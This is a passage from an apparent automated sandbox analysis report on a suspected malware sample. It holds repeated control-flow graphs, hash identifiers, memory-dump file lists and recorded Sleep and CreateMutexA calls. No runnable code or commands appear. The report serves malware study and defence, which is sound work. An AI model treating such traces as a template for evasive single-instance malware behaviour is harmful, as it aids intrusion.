                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 76d06df7804f95ba40ebc3219d7a09a8efcc2863323c1aa04376d6a37596140a
                                                                                                                                                                                                                                              • Instruction ID: c21dd15416631b2fa7f04728edb1d76169b83e2cfab3c877b76dd2147af90fda
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d06df7804f95ba40ebc3219d7a09a8efcc2863323c1aa04376d6a37596140a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18318C31A401008BEB08DB7CCC89B6DBB62DF86324F248619E814D76F5D7B959C0A753

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 349 f4a54d-f4a56d 353 f4a56f-f4a57b 349->353 354 f4a59b-f4a5b7 349->354 355 f4a591-f4a598 call f5d663 353->355 356 f4a57d-f4a58b 353->356 357 f4a5e5-f4a604 354->357 358 f4a5b9-f4a5c5 354->358 355->354 356->355 359 f4a944-f4a949 call f76c6a 356->359 363 f4a606-f4a612 357->363 364 f4a632-f4a916 call f580c0 357->364 361 f4a5c7-f4a5d5 358->361 362 f4a5db-f4a5e2 call f5d663 358->362 377 f4a94e 359->377 378 f4a949 call f76c6a 359->378 361->359 361->362 362->357 369 f4a614-f4a622 363->369 370 f4a628-f4a62f call f5d663 363->370 369->359 369->370 370->364 380 f4a953-f4a994 Sleep CreateMutexA 377->380 381 f4a94e call f76c6a 377->381 378->377 383 f4a996-f4a998 380->383 384 f4a9a7-f4a9a8 380->384 381->380 383->384 385 f4a99a-f4a9a5 383->385 385->384
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 376bb8d4fcf7c0c41beccaef7de030d8ec4b90ad25050c938734596f8845814c
                                                                                                                                                                                                                                              • Instruction ID: de178370a6175f082a53fad5efaedb3f5691b8b88d30e439bdf168040bcef427
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 376bb8d4fcf7c0c41beccaef7de030d8ec4b90ad25050c938734596f8845814c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA318C71A401008BEB08DB7CCD85B6DBB66DFC6328F248619E804DB2D1CB798980A713

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 387 f4a682-f4a6a2 391 f4a6a4-f4a6b0 387->391 392 f4a6d0-f4a6ec 387->392 393 f4a6c6-f4a6cd call f5d663 391->393 394 f4a6b2-f4a6c0 391->394 395 f4a6ee-f4a6fa 392->395 396 f4a71a-f4a739 392->396 393->392 394->393 399 f4a949 394->399 401 f4a710-f4a717 call f5d663 395->401 402 f4a6fc-f4a70a 395->402 397 f4a767-f4a916 call f580c0 396->397 398 f4a73b-f4a747 396->398 403 f4a75d-f4a764 call f5d663 398->403 404 f4a749-f4a757 398->404 405 f4a94e 399->405 406 f4a949 call f76c6a 399->406 401->396 402->399 402->401 403->397 404->399 404->403 411 f4a953-f4a994 Sleep CreateMutexA 405->411 412 f4a94e call f76c6a 405->412 406->405 419 f4a996-f4a998 411->419 420 f4a9a7-f4a9a8 411->420 412->411 419->420 421 f4a99a-f4a9a5 419->421 421->420
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: ab4f31df81cf05a30bfcba37125d14bbfdd5947daaa812d2fd1d5664df81d83e
                                                                                                                                                                                                                                              • Instruction ID: 044fcef10260cf589bc130e4b6c3baad41b2661e2487a6f87ecc06109ea5de55
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab4f31df81cf05a30bfcba37125d14bbfdd5947daaa812d2fd1d5664df81d83e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3317771A802048BEB18DB7CCC89B6DBB76DF82324F248619E814D77E1C7799980E713

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 423 f49adc-f49ae8 424 f49afe-f49b27 call f5d663 423->424 425 f49aea-f49af8 423->425 433 f49b55-f49b57 424->433 434 f49b29-f49b35 424->434 425->424 426 f4a917 425->426 428 f4a953-f4a994 Sleep CreateMutexA 426->428 429 f4a917 call f76c6a 426->429 437 f4a996-f4a998 428->437 438 f4a9a7-f4a9a8 428->438 429->428 435 f49b65-f49d91 call f57a00 call f45c10 call f48b30 call f58220 call f57a00 call f45c10 call f48b30 call f58220 433->435 436 f49b59-f4a916 call f580c0 433->436 439 f49b37-f49b45 434->439 440 f49b4b-f49b52 call f5d663 434->440 437->438 444 f4a99a-f4a9a5 437->444 439->426 439->440 440->433 444->438
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 54874ca9aefe8c9d6798c51584e2d5b8d049e4063d3bbcf05ac93829d2b5cc32
                                                                                                                                                                                                                                              • Instruction ID: f3f65c2cf126b44b916ad5ad00f3a1a4b61e042dac13e56877cb5cddea0aac0a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54874ca9aefe8c9d6798c51584e2d5b8d049e4063d3bbcf05ac93829d2b5cc32
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94219E717442009BFB189F6CDCC5B2DFB65EBC2324F20461AE804C76E1DBB95980E612

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 500 f4a856-f4a86e 501 f4a870-f4a87c 500->501 502 f4a89c-f4a89e 500->502 503 f4a892-f4a899 call f5d663 501->503 504 f4a87e-f4a88c 501->504 505 f4a8a0-f4a8a7 502->505 506 f4a8a9-f4a8b1 call f47d30 502->506 503->502 504->503 509 f4a94e 504->509 507 f4a8eb-f4a916 call f580c0 505->507 517 f4a8e4-f4a8e6 506->517 518 f4a8b3-f4a8bb call f47d30 506->518 513 f4a953-f4a987 Sleep CreateMutexA 509->513 514 f4a94e call f76c6a 509->514 520 f4a98e-f4a994 513->520 514->513 517->507 518->517 524 f4a8bd-f4a8c5 call f47d30 518->524 522 f4a996-f4a998 520->522 523 f4a9a7-f4a9a8 520->523 522->523 525 f4a99a-f4a9a5 522->525 524->517 529 f4a8c7-f4a8cf call f47d30 524->529 525->523 529->517 532 f4a8d1-f4a8d9 call f47d30 529->532 532->517 535 f4a8db-f4a8e2 532->535 535->507
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
